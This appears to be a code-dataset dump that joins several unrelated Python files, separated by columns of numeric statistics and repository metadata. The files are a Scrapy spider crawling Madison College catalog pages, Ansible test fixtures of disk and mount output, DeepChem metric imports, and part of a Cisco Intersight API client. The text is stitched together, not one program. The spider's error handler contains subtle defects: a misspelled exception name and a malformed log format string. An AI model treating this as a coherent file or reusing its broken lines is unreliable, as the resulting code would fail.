"https://my.madisoncollege.edu/app/catalog/listCoursesBySubject/MATC1/E/EARLYCHL/NDEG", "https://my.madisoncollege.edu/app/catalog/listCoursesBySubject/MATC1/E/EB%20TECH/NDEG", "https://my.madisoncollege.edu/app/catalog/listCoursesBySubject/MATC1/E/ELEC/NDEG", "https://my.madisoncollege.edu/app/catalog/listCoursesBySubject/MATC1/E/ELECSERV/NDEG", "https://my.madisoncollege.edu/app/catalog/listCoursesBySubject/MATC1/E/ELECT/NDEG", "https://my.madisoncollege.edu/app/catalog/listCoursesBySubject/MATC1/E/ELECTRIC/NDEG", "https://my.madisoncollege.edu/app/catalog/listCoursesBySubject/MATC1/E/EMS/NDEG", "https://my.madisoncollege.edu/app/catalog/listCoursesBySubject/MATC1/E/ENG%20LANG/NDEG", "https://my.madisoncollege.edu/app/catalog/listCoursesBySubject/MATC1/E/ENGLABE/NDEG", "https://my.madisoncollege.edu/app/catalog/listCoursesBySubject/MATC1/E/ENRICH/NDEG", "https://my.madisoncollege.edu/app/catalog/listCoursesBySubject/MATC1/E/EVENT/NDEG",
"https://my.madisoncollege.edu/app/about"
"https://my.madisoncollege.edu/app/catalog/listCoursesBySubject/MATC1/F/FAMREL/NDEG", "https://my.madisoncollege.edu/app/catalog/listCoursesBySubject/MATC1/F/FARMBUS/NDEG", "https://my.madisoncollege.edu/app/catalog/listCoursesBySubject/MATC1/F/FIN%20PLAN/NDEG", "https://my.madisoncollege.edu/app/catalog/listCoursesBySubject/MATC1/F/FIRET/NDEG", "https://my.madisoncollege.edu/app/catalog/listCoursesBySubject/MATC1/F/FITNESS/NDEG", "https://my.madisoncollege.edu/app/catalog/listCoursesBySubject/MATC1/F/FOODS/NDEG"
"https://my.madisoncollege.edu/app/catalog/listCoursesBySubject/MATC1/H/HEALTH/NDEG", "https://my.madisoncollege.edu/app/catalog/listCoursesBySubject/MATC1/H/HISTORY/NDEG", "https://my.madisoncollege.edu/app/catalog/listCoursesBySubject/MATC1/H/HLTHCARE/NDEG", "https://my.madisoncollege.edu/app/catalog/listCoursesBySubject/MATC1/H/HLTHINTR/NDEG", "https://my.madisoncollege.edu/app/catalog/listCoursesBySubject/MATC1/H/HOME%20DEC/NDEG", "https://my.madisoncollege.edu/app/catalog/listCoursesBySubject/MATC1/H/HOMEINSP/NDEG", "https://my.madisoncollege.edu/app/catalog/listCoursesBySubject/MATC1/H/HOMESHOP/NDEG", "https://my.madisoncollege.edu/app/catalog/listCoursesBySubject/MATC1/H/HORT/NDEG", "https://my.madisoncollege.edu/app/catalog/listCoursesBySubject/MATC1/H/HVAC/NDEG",
"https://my.madisoncollege.edu/app/catalog/listCoursesBySubject/MATC1/I/INDUSTRY/NDEG", "https://my.madisoncollege.edu/app/catalog/listCoursesBySubject/MATC1/I/INSURE/NDEG"
"https://my.madisoncollege.edu/app/catalog/listCoursesBySubject/MATC1/G/GARDEN/NDEG", "https://my.madisoncollege.edu/app/catalog/listCoursesBySubject/MATC1/G/GRAPHIC/NDEG", "https://my.madisoncollege.edu/app/catalog/listCoursesBySubject/MATC1/G/GROUPDYN/NDEG"
"https://my.madisoncollege.edu/app/catalog/listCoursesBySubject/MATC1/N/NONPROFT/NDEG", "https://my.madisoncollege.edu/app/catalog/listCoursesBySubject/MATC1/N/NRSAD/NDEG"
"https://my.madisoncollege.edu/app/catalog/listCoursesBySubject/MATC1/S/SCIENCE/NDEG", "https://my.madisoncollege.edu/app/catalog/listCoursesBySubject/MATC1/S/SEWFIBER/NDEG", "https://my.madisoncollege.edu/app/catalog/listCoursesBySubject/MATC1/S/SHEETMTL/NDEG", "https://my.madisoncollege.edu/app/catalog/listCoursesBySubject/MATC1/S/SUPRMGMT/NDEG"
"https://my.madisoncollege.edu/app/catalog/listCoursesBySubject/MATC1/P/PHOTOVID/NDEG", "https://my.madisoncollege.edu/app/catalog/listCoursesBySubject/MATC1/P/PHYED/NDEG", "https://my.madisoncollege.edu/app/catalog/listCoursesBySubject/MATC1/P/PLUMBNG/NDEG", "https://my.madisoncollege.edu/app/catalog/listCoursesBySubject/MATC1/P/PROC%20IMP/NDEG", "https://my.madisoncollege.edu/app/catalog/listCoursesBySubject/MATC1/P/PROF%20DEV/NDEG",
"https://my.madisoncollege.edu/app/catalog/listCoursesBySubject/MATC1/M/MACHT/NDEG", "https://my.madisoncollege.edu/app/catalog/listCoursesBySubject/MATC1/M/MATHABE/NDEG", "https://my.madisoncollege.edu/app/catalog/listCoursesBySubject/MATC1/M/MCYCLE/NDEG", "https://my.madisoncollege.edu/app/catalog/listCoursesBySubject/MATC1/M/MKTG/NDEG", "https://my.madisoncollege.edu/app/catalog/listCoursesBySubject/MATC1/M/MUSICDNC/NDEG",
"https://my.madisoncollege.edu/app/catalog/listCoursesBySubject/MATC1/W/WEB%20DSGN/NDEG", "https://my.madisoncollege.edu/app/catalog/listCoursesBySubject/MATC1/W/WELLNESS/NDEG", "https://my.madisoncollege.edu/app/catalog/listCoursesBySubject/MATC1/W/WRITEPUB/NDEG", "https://my.madisoncollege.edu/app/catalog/listCoursesBySubject/MATC1/W/WRLDLANG/NDEG",
"https://my.madisoncollege.edu/app/about",
"https://my.madisoncollege.edu/app/catalog/listCoursesBySubject/MATC1/R/READABE/NDEG", "https://my.madisoncollege.edu/app/catalog/listCoursesBySubject/MATC1/R/REALEST/NDEG", "https://my.madisoncollege.edu/app/catalog/listCoursesBySubject/MATC1/R/RELART/NDEG",
"https://my.madisoncollege.edu/app/about",
]
def start_requests( self ):
for u in self.start_urls:
yield scrapy.Request( u, callback = self.parse_httpbin,
errback = self.errback_httpbin,
dont_filter = True )
def parse_httpbin( self, response ):
self.logger.info("Go successful respinse {}".format(response.url))
items = MatcLinksItem()
links = response.xpath('*//a/@href').extract()
items['links'] = links
yield items
def errback_httpbin( self, failure):
# log all failures
self.logger.error(repr(failure))
# in case you want to do something special for some errors,
# you may need the non-200 response
if failure.check(HttpError):
# These exception come from HttpError spider middleware
# you can get non-200 response
response = failure.value.response
self.logger.error("HttpError on %s", response.url )
elif failure.check(DNSLookupError):
# This is the original request
request = failure.request
self.logger.error('DNSLookupError on %', request.url)
elif failure.check( TimeoutError, TPCTimeOutError ):
request = failure.request
self.logger.error('TimeoutError on %s', request.url)
| 175.387597
| 1,468
| 0.800928
| 2,868
| 22,625
| 6.314156
| 0.117503
| 0.22718
| 0.279474
| 0.319399
| 0.880336
| 0.877022
| 0.868629
| 0.866641
| 0.866641
| 0.863272
| 0
| 0.012945
| 0.033768
| 22,625
| 128
| 1,469
| 176.757813
| 0.815425
| 0.009724
| 0
| 0.092105
| 0
| 3.105263
| 0.8851
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.039474
| false
| 0
| 0.144737
| 0
| 0.236842
| 0
| 0
| 0
| 0
| null | 1
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 13
|
f41c4d6f70b1357efe53b4834143901d9f058b8d
| 13,051
|
py
|
Python
|
test/units/module_utils/facts/hardware/linux_data.py
|
Container-Projects/ansible-provider-docs
|
100b695b0b0c4d8d08af362069557ffc735d0d7e
|
[
"PSF-2.0",
"BSD-2-Clause",
"MIT"
] | 37
|
2017-08-15T15:02:43.000Z
|
2021-07-23T03:44:31.000Z
|
test/units/module_utils/facts/hardware/linux_data.py
|
Container-Projects/ansible-provider-docs
|
100b695b0b0c4d8d08af362069557ffc735d0d7e
|
[
"PSF-2.0",
"BSD-2-Clause",
"MIT"
] | 12
|
2018-01-10T05:25:25.000Z
|
2021-11-28T06:55:48.000Z
|
test/units/module_utils/facts/hardware/linux_data.py
|
Container-Projects/ansible-provider-docs
|
100b695b0b0c4d8d08af362069557ffc735d0d7e
|
[
"PSF-2.0",
"BSD-2-Clause",
"MIT"
] | 49
|
2017-08-15T09:52:13.000Z
|
2022-03-21T17:11:54.000Z
|
# This file is part of Ansible
#
# Ansible is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# Ansible is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with Ansible. If not, see <http://www.gnu.org/licenses/>.
from __future__ import (absolute_import, division, print_function)
__metaclass__ = type
LSBLK_OUTPUT = b"""
/dev/sda
/dev/sda1 32caaec3-ef40-4691-a3b6-438c3f9bc1c0
/dev/sda2 66Ojcd-ULtu-1cZa-Tywo-mx0d-RF4O-ysA9jK
/dev/mapper/fedora_dhcp129--186-swap eae6059d-2fbe-4d1c-920d-a80bbeb1ac6d
/dev/mapper/fedora_dhcp129--186-root d34cf5e3-3449-4a6c-8179-a1feb2bca6ce
/dev/mapper/fedora_dhcp129--186-home 2d3e4853-fa69-4ccf-8a6a-77b05ab0a42d
/dev/sr0
/dev/loop0 0f031512-ab15-497d-9abd-3a512b4a9390
/dev/loop1 7c1b0f30-cf34-459f-9a70-2612f82b870a
/dev/loop9 0f031512-ab15-497d-9abd-3a512b4a9390
/dev/loop9 7c1b4444-cf34-459f-9a70-2612f82b870a
/dev/mapper/docker-253:1-1050967-pool
/dev/loop2
/dev/mapper/docker-253:1-1050967-pool
"""
LSBLK_OUTPUT_2 = b"""
/dev/sda
/dev/sda1 32caaec3-ef40-4691-a3b6-438c3f9bc1c0
/dev/sda2 66Ojcd-ULtu-1cZa-Tywo-mx0d-RF4O-ysA9jK
/dev/mapper/fedora_dhcp129--186-swap eae6059d-2fbe-4d1c-920d-a80bbeb1ac6d
/dev/mapper/fedora_dhcp129--186-root d34cf5e3-3449-4a6c-8179-a1feb2bca6ce
/dev/mapper/fedora_dhcp129--186-home 2d3e4853-fa69-4ccf-8a6a-77b05ab0a42d
/dev/mapper/an-example-mapper with a space in the name 84639acb-013f-4d2f-9392-526a572b4373
/dev/sr0
/dev/loop0 0f031512-ab15-497d-9abd-3a512b4a9390
"""
LSBLK_UUIDS = {'/dev/sda1': '66Ojcd-ULtu-1cZa-Tywo-mx0d-RF4O-ysA9jK'}
UDEVADM_UUID = 'N/A'
UDEVADM_OUTPUT = """
UDEV_LOG=3
DEVPATH=/devices/pci0000:00/0000:00:07.0/virtio2/block/vda/vda1
MAJOR=252
MINOR=1
DEVNAME=/dev/vda1
DEVTYPE=partition
SUBSYSTEM=block
MPATH_SBIN_PATH=/sbin
ID_PATH=pci-0000:00:07.0-virtio-pci-virtio2
ID_PART_TABLE_TYPE=dos
ID_FS_UUID=57b1a3e7-9019-4747-9809-7ec52bba9179
ID_FS_UUID_ENC=57b1a3e7-9019-4747-9809-7ec52bba9179
ID_FS_VERSION=1.0
ID_FS_TYPE=ext4
ID_FS_USAGE=filesystem
LVM_SBIN_PATH=/sbin
DEVLINKS=/dev/block/252:1 /dev/disk/by-path/pci-0000:00:07.0-virtio-pci-virtio2-part1 /dev/disk/by-uuid/57b1a3e7-9019-4747-9809-7ec52bba9179
"""
MTAB = """
sysfs /sys sysfs rw,seclabel,nosuid,nodev,noexec,relatime 0 0
proc /proc proc rw,nosuid,nodev,noexec,relatime 0 0
devtmpfs /dev devtmpfs rw,seclabel,nosuid,size=8044400k,nr_inodes=2011100,mode=755 0 0
securityfs /sys/kernel/security securityfs rw,nosuid,nodev,noexec,relatime 0 0
tmpfs /dev/shm tmpfs rw,seclabel,nosuid,nodev 0 0
devpts /dev/pts devpts rw,seclabel,nosuid,noexec,relatime,gid=5,mode=620,ptmxmode=000 0 0
tmpfs /run tmpfs rw,seclabel,nosuid,nodev,mode=755 0 0
tmpfs /sys/fs/cgroup tmpfs ro,seclabel,nosuid,nodev,noexec,mode=755 0 0
cgroup /sys/fs/cgroup/systemd cgroup rw,nosuid,nodev,noexec,relatime,xattr,release_agent=/usr/lib/systemd/systemd-cgroups-agent,name=systemd 0 0
pstore /sys/fs/pstore pstore rw,seclabel,nosuid,nodev,noexec,relatime 0 0
cgroup /sys/fs/cgroup/devices cgroup rw,nosuid,nodev,noexec,relatime,devices 0 0
cgroup /sys/fs/cgroup/freezer cgroup rw,nosuid,nodev,noexec,relatime,freezer 0 0
cgroup /sys/fs/cgroup/memory cgroup rw,nosuid,nodev,noexec,relatime,memory 0 0
cgroup /sys/fs/cgroup/pids cgroup rw,nosuid,nodev,noexec,relatime,pids 0 0
cgroup /sys/fs/cgroup/blkio cgroup rw,nosuid,nodev,noexec,relatime,blkio 0 0
cgroup /sys/fs/cgroup/cpuset cgroup rw,nosuid,nodev,noexec,relatime,cpuset 0 0
cgroup /sys/fs/cgroup/cpu,cpuacct cgroup rw,nosuid,nodev,noexec,relatime,cpu,cpuacct 0 0
cgroup /sys/fs/cgroup/hugetlb cgroup rw,nosuid,nodev,noexec,relatime,hugetlb 0 0
cgroup /sys/fs/cgroup/perf_event cgroup rw,nosuid,nodev,noexec,relatime,perf_event 0 0
cgroup /sys/fs/cgroup/net_cls,net_prio cgroup rw,nosuid,nodev,noexec,relatime,net_cls,net_prio 0 0
configfs /sys/kernel/config configfs rw,relatime 0 0
/dev/mapper/fedora_dhcp129--186-root / ext4 rw,seclabel,relatime,data=ordered 0 0
selinuxfs /sys/fs/selinux selinuxfs rw,relatime 0 0
systemd-1 /proc/sys/fs/binfmt_misc autofs rw,relatime,fd=24,pgrp=1,timeout=0,minproto=5,maxproto=5,direct 0 0
debugfs /sys/kernel/debug debugfs rw,seclabel,relatime 0 0
hugetlbfs /dev/hugepages hugetlbfs rw,seclabel,relatime 0 0
tmpfs /tmp tmpfs rw,seclabel 0 0
mqueue /dev/mqueue mqueue rw,seclabel,relatime 0 0
/dev/loop0 /var/lib/machines btrfs rw,seclabel,relatime,space_cache,subvolid=5,subvol=/ 0 0
/dev/sda1 /boot ext4 rw,seclabel,relatime,data=ordered 0 0
/dev/mapper/fedora_dhcp129--186-home /home ext4 rw,seclabel,relatime,data=ordered 0 0
tmpfs /run/user/1000 tmpfs rw,seclabel,nosuid,nodev,relatime,size=1611044k,mode=700,uid=1000,gid=1000 0 0
gvfsd-fuse /run/user/1000/gvfs fuse.gvfsd-fuse rw,nosuid,nodev,relatime,user_id=1000,group_id=1000 0 0
fusectl /sys/fs/fuse/connections fusectl rw,relatime 0 0
grimlock.g.a: /home/adrian/sshfs-grimlock fuse.sshfs rw,nosuid,nodev,relatime,user_id=1000,group_id=1000 0 0
grimlock.g.a:test_path/path_with'single_quotes /home/adrian/sshfs-grimlock-single-quote fuse.sshfs rw,nosuid,nodev,relatime,user_id=1000,group_id=1000 0 0
grimlock.g.a:path_with'single_quotes /home/adrian/sshfs-grimlock-single-quote-2 fuse.sshfs rw,nosuid,nodev,relatime,user_id=1000,group_id=1000 0 0
grimlock.g.a:/mnt/data/foto's /home/adrian/fotos fuse.sshfs rw,nosuid,nodev,relatime,user_id=1000,group_id=1000 0 0
"""
MTAB_ENTRIES = [
[
'sysfs',
'/sys',
'sysfs',
'rw,seclabel,nosuid,nodev,noexec,relatime',
'0',
'0'
],
['proc', '/proc', 'proc', 'rw,nosuid,nodev,noexec,relatime', '0', '0'],
[
'devtmpfs',
'/dev',
'devtmpfs',
'rw,seclabel,nosuid,size=8044400k,nr_inodes=2011100,mode=755',
'0',
'0'
],
[
'securityfs',
'/sys/kernel/security',
'securityfs',
'rw,nosuid,nodev,noexec,relatime',
'0',
'0'
],
['tmpfs', '/dev/shm', 'tmpfs', 'rw,seclabel,nosuid,nodev', '0', '0'],
[
'devpts',
'/dev/pts',
'devpts',
'rw,seclabel,nosuid,noexec,relatime,gid=5,mode=620,ptmxmode=000',
'0',
'0'
],
['tmpfs', '/run', 'tmpfs', 'rw,seclabel,nosuid,nodev,mode=755', '0', '0'],
[
'tmpfs',
'/sys/fs/cgroup',
'tmpfs',
'ro,seclabel,nosuid,nodev,noexec,mode=755',
'0',
'0'
],
[
'cgroup',
'/sys/fs/cgroup/systemd',
'cgroup',
'rw,nosuid,nodev,noexec,relatime,xattr,release_agent=/usr/lib/systemd/systemd-cgroups-agent,name=systemd',
'0',
'0'
],
[
'pstore',
'/sys/fs/pstore',
'pstore',
'rw,seclabel,nosuid,nodev,noexec,relatime',
'0',
'0'
],
[
'cgroup',
'/sys/fs/cgroup/devices',
'cgroup',
'rw,nosuid,nodev,noexec,relatime,devices',
'0',
'0'
],
[
'cgroup',
'/sys/fs/cgroup/freezer',
'cgroup',
'rw,nosuid,nodev,noexec,relatime,freezer',
'0',
'0'
],
[
'cgroup',
'/sys/fs/cgroup/memory',
'cgroup',
'rw,nosuid,nodev,noexec,relatime,memory',
'0',
'0'
],
[
'cgroup',
'/sys/fs/cgroup/pids',
'cgroup',
'rw,nosuid,nodev,noexec,relatime,pids',
'0',
'0'
],
[
'cgroup',
'/sys/fs/cgroup/blkio',
'cgroup',
'rw,nosuid,nodev,noexec,relatime,blkio',
'0',
'0'
],
[
'cgroup',
'/sys/fs/cgroup/cpuset',
'cgroup',
'rw,nosuid,nodev,noexec,relatime,cpuset',
'0',
'0'
],
[
'cgroup',
'/sys/fs/cgroup/cpu,cpuacct',
'cgroup',
'rw,nosuid,nodev,noexec,relatime,cpu,cpuacct',
'0',
'0'
],
[
'cgroup',
'/sys/fs/cgroup/hugetlb',
'cgroup',
'rw,nosuid,nodev,noexec,relatime,hugetlb',
'0',
'0'
],
[
'cgroup',
'/sys/fs/cgroup/perf_event',
'cgroup',
'rw,nosuid,nodev,noexec,relatime,perf_event',
'0',
'0'
],
[
'cgroup',
'/sys/fs/cgroup/net_cls,net_prio',
'cgroup',
'rw,nosuid,nodev,noexec,relatime,net_cls,net_prio',
'0',
'0'
],
['configfs', '/sys/kernel/config', 'configfs', 'rw,relatime', '0', '0'],
[
'/dev/mapper/fedora_dhcp129--186-root',
'/',
'ext4',
'rw,seclabel,relatime,data=ordered',
'0',
'0'
],
['selinuxfs', '/sys/fs/selinux', 'selinuxfs', 'rw,relatime', '0', '0'],
[
'systemd-1',
'/proc/sys/fs/binfmt_misc',
'autofs',
'rw,relatime,fd=24,pgrp=1,timeout=0,minproto=5,maxproto=5,direct',
'0',
'0'
],
['debugfs', '/sys/kernel/debug', 'debugfs', 'rw,seclabel,relatime', '0', '0'],
[
'hugetlbfs',
'/dev/hugepages',
'hugetlbfs',
'rw,seclabel,relatime',
'0',
'0'
],
['tmpfs', '/tmp', 'tmpfs', 'rw,seclabel', '0', '0'],
['mqueue', '/dev/mqueue', 'mqueue', 'rw,seclabel,relatime', '0', '0'],
[
'/dev/loop0',
'/var/lib/machines',
'btrfs',
'rw,seclabel,relatime,space_cache,subvolid=5,subvol=/',
'0',
'0'
],
['/dev/sda1', '/boot', 'ext4', 'rw,seclabel,relatime,data=ordered', '0', '0'],
# A 'none' fstype
['/dev/sdz3', '/not/a/real/device', 'none', 'rw,seclabel,relatime,data=ordered', '0', '0'],
# lets assume this is a bindmount
['/dev/sdz4', '/not/a/real/bind_mount', 'ext4', 'rw,seclabel,relatime,data=ordered', '0', '0'],
[
'/dev/mapper/fedora_dhcp129--186-home',
'/home',
'ext4',
'rw,seclabel,relatime,data=ordered',
'0',
'0'
],
[
'tmpfs',
'/run/user/1000',
'tmpfs',
'rw,seclabel,nosuid,nodev,relatime,size=1611044k,mode=700,uid=1000,gid=1000',
'0',
'0'
],
[
'gvfsd-fuse',
'/run/user/1000/gvfs',
'fuse.gvfsd-fuse',
'rw,nosuid,nodev,relatime,user_id=1000,group_id=1000',
'0',
'0'
],
['fusectl', '/sys/fs/fuse/connections', 'fusectl', 'rw,relatime', '0', '0']]
STATVFS_INFO = {'/': {'block_available': 10192323,
'block_size': 4096,
'block_total': 12868728,
'block_used': 2676405,
'inode_available': 3061699,
'inode_total': 3276800,
'inode_used': 215101,
'size_available': 41747755008,
'size_total': 52710309888},
'/not/a/real/bind_mount': {},
'/home': {'block_available': 1001578731,
'block_size': 4096,
'block_total': 105871006,
'block_used': 5713133,
'inode_available': 26860880,
'inode_total': 26902528,
'inode_used': 41648,
'size_available': 410246647808,
'size_total': 433647640576},
'/var/lib/machines': {'block_available': 10192316,
'block_size': 4096,
'block_total': 12868728,
'block_used': 2676412,
'inode_available': 3061699,
'inode_total': 3276800,
'inode_used': 215101,
'size_available': 41747726336,
'size_total': 52710309888},
'/boot': {'block_available': 187585,
'block_size': 4096,
'block_total': 249830,
'block_used': 62245,
'inode_available': 65096,
'inode_total': 65536,
'inode_used': 440,
'size_available': 768348160,
'size_total': 1023303680}
}
# ['/dev/sdz4', '/not/a/real/bind_mount', 'ext4', 'rw,seclabel,relatime,data=ordered', '0', '0'],
BIND_MOUNTS = ['/not/a/real/bind_mount']
| 35.953168
| 154
| 0.586698
| 1,645
| 13,051
| 4.578116
| 0.210942
| 0.019918
| 0.072235
| 0.099588
| 0.80162
| 0.779445
| 0.761652
| 0.735759
| 0.725136
| 0.70482
| 0
| 0.11611
| 0.264194
| 13,051
| 362
| 155
| 36.052486
| 0.668125
| 0.058999
| 0
| 0.45509
| 0
| 0.095808
| 0.659953
| 0.404958
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.002994
| 0
| 0.002994
| 0.002994
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
f471e9e97ad1e29c96ba5bcb34ba989bacba0f2b
| 1,888
|
py
|
Python
|
deepchem/metrics/__init__.py
|
hsjang001205/deepchem
|
02fce35729826b1ef12a1cfa6519b491510217be
|
[
"MIT"
] | 1
|
2020-08-19T17:25:27.000Z
|
2020-08-19T17:25:27.000Z
|
deepchem/metrics/__init__.py
|
swpper/deepchem
|
510b9bf1805bc5a472c1a519700e6b128e06c651
|
[
"MIT"
] | 1
|
2020-09-22T18:42:21.000Z
|
2020-09-22T18:42:21.000Z
|
deepchem/metrics/__init__.py
|
swpper/deepchem
|
510b9bf1805bc5a472c1a519700e6b128e06c651
|
[
"MIT"
] | 1
|
2020-10-06T13:31:21.000Z
|
2020-10-06T13:31:21.000Z
|
# flake8: noqa
# metric class
from deepchem.metrics.metric import Metric
# metrics utils
from deepchem.metrics.metric import threshold_predictions
from deepchem.metrics.metric import normalize_weight_shape
from deepchem.metrics.metric import normalize_labels_shape
from deepchem.metrics.metric import normalize_prediction_shape
from deepchem.metrics.metric import handle_classification_mode
from deepchem.metrics.metric import to_one_hot
from deepchem.metrics.metric import from_one_hot
# sklearn & scipy score function
from deepchem.metrics.score_function import matthews_corrcoef
from deepchem.metrics.score_function import recall_score
from deepchem.metrics.score_function import kappa_score
from deepchem.metrics.score_function import cohen_kappa_score
from deepchem.metrics.score_function import r2_score
from deepchem.metrics.score_function import mean_squared_error
from deepchem.metrics.score_function import mean_absolute_error
from deepchem.metrics.score_function import precision_score
from deepchem.metrics.score_function import precision_recall_curve
from deepchem.metrics.score_function import auc
from deepchem.metrics.score_function import jaccard_score
from deepchem.metrics.score_function import f1_score
from deepchem.metrics.score_function import roc_auc_score
from deepchem.metrics.score_function import accuracy_score
from deepchem.metrics.score_function import balanced_accuracy_score
from deepchem.metrics.score_function import pearsonr
# original score function
from deepchem.metrics.score_function import pearson_r2_score
from deepchem.metrics.score_function import jaccard_index
from deepchem.metrics.score_function import pixel_error
from deepchem.metrics.score_function import prc_auc_score
from deepchem.metrics.score_function import rms_score
from deepchem.metrics.score_function import mae_score
from deepchem.metrics.score_function import bedroc_score
| 47.2
| 67
| 0.886123
| 264
| 1,888
| 6.090909
| 0.200758
| 0.231343
| 0.366294
| 0.343284
| 0.840174
| 0.76306
| 0.644901
| 0.299751
| 0
| 0
| 0
| 0.002296
| 0.077331
| 1,888
| 39
| 68
| 48.410256
| 0.920781
| 0.049788
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 0
| 0
| 0
| null | 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 8
|
be49d4b8dd6aadb0548215e5d9f204bc5d5af78a
| 132,336
|
py
|
Python
|
intersight/api/iaas_api.py
|
sdnit-se/intersight-python
|
551f7685c0f76bb8af60ec83ffb6f9672d49a4ae
|
[
"Apache-2.0"
] | 21
|
2018-03-29T14:20:35.000Z
|
2021-10-13T05:11:41.000Z
|
intersight/api/iaas_api.py
|
sdnit-se/intersight-python
|
551f7685c0f76bb8af60ec83ffb6f9672d49a4ae
|
[
"Apache-2.0"
] | 14
|
2018-01-30T15:45:46.000Z
|
2022-02-23T14:23:21.000Z
|
intersight/api/iaas_api.py
|
sdnit-se/intersight-python
|
551f7685c0f76bb8af60ec83ffb6f9672d49a4ae
|
[
"Apache-2.0"
] | 18
|
2018-01-03T15:09:56.000Z
|
2021-07-16T02:21:54.000Z
|
# coding: utf-8
"""
Cisco Intersight
Cisco Intersight is a management platform delivered as a service with embedded analytics for your Cisco and 3rd party IT infrastructure. This platform offers an intelligent level of management that enables IT organizations to analyze, simplify, and automate their environments in more advanced ways than the prior generations of tools. Cisco Intersight provides an integrated and intuitive management experience for resources in the traditional data center as well as at the edge. With flexible deployment options to address complex security needs, getting started with Intersight is quick and easy. Cisco Intersight has deep integration with Cisco UCS and HyperFlex systems allowing for remote deployment, configuration, and ongoing maintenance. The model-based deployment works for a single system in a remote location or hundreds of systems in a data center and enables rapid, standardized configuration and deployment. It also streamlines maintaining those systems whether you are working with small or very large configurations. # noqa: E501
The version of the OpenAPI document: 1.0.9-1295
Contact: intersight@cisco.com
Generated by: https://openapi-generator.tech
"""
from __future__ import absolute_import
import re # noqa: F401
# python 2 and python 3 compatibility library
import six
from intersight.api_client import ApiClient
from intersight.exceptions import (ApiTypeError, ApiValueError)
class IaasApi(object):
"""NOTE: This class is auto generated by OpenAPI Generator
Ref: https://openapi-generator.tech
Do not edit the class manually.
"""
def __init__(self, api_client=None):
if api_client is None:
api_client = ApiClient()
self.api_client = api_client
def delete_iaas_ucsd_info(self, moid, **kwargs): # noqa: E501
"""Delete a 'iaas.UcsdInfo' resource. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.delete_iaas_ucsd_info(moid, async_req=True)
>>> result = thread.get()
:param async_req bool: execute request asynchronously
:param str moid: The unique Moid identifier of a resource instance. (required)
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: None
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
return self.delete_iaas_ucsd_info_with_http_info(
moid, **kwargs) # noqa: E501
def delete_iaas_ucsd_info_with_http_info(self, moid,
**kwargs): # noqa: E501
"""Delete a 'iaas.UcsdInfo' resource. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.delete_iaas_ucsd_info_with_http_info(moid, async_req=True)
>>> result = thread.get()
:param async_req bool: execute request asynchronously
:param str moid: The unique Moid identifier of a resource instance. (required)
:param _return_http_data_only: response data without head status code
and headers
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: None
If the method is called asynchronously,
returns the request thread.
"""
local_var_params = locals()
all_params = ['moid'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
for key, val in six.iteritems(local_var_params['kwargs']):
if key not in all_params:
raise ApiTypeError("Got an unexpected keyword argument '%s'"
" to method delete_iaas_ucsd_info" % key)
local_var_params[key] = val
del local_var_params['kwargs']
# verify the required parameter 'moid' is set
if self.api_client.client_side_validation and (
'moid' not in local_var_params or # noqa: E501
local_var_params['moid'] is None): # noqa: E501
raise ApiValueError(
"Missing the required parameter `moid` when calling `delete_iaas_ucsd_info`"
) # noqa: E501
collection_formats = {}
path_params = {}
if 'moid' in local_var_params:
path_params['Moid'] = local_var_params['moid'] # noqa: E501
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['cookieAuth', 'oAuth2'] # noqa: E501
return self.api_client.call_api(
'/iaas/UcsdInfos/{Moid}',
'DELETE',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type=None, # noqa: E501
auth_settings=auth_settings,
async_req=local_var_params.get('async_req'),
_return_http_data_only=local_var_params.get(
'_return_http_data_only'), # noqa: E501
_preload_content=local_var_params.get('_preload_content', True),
_request_timeout=local_var_params.get('_request_timeout'),
collection_formats=collection_formats)
def get_iaas_connector_pack_by_moid(self, moid, **kwargs): # noqa: E501
"""Read a 'iaas.ConnectorPack' resource. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_iaas_connector_pack_by_moid(moid, async_req=True)
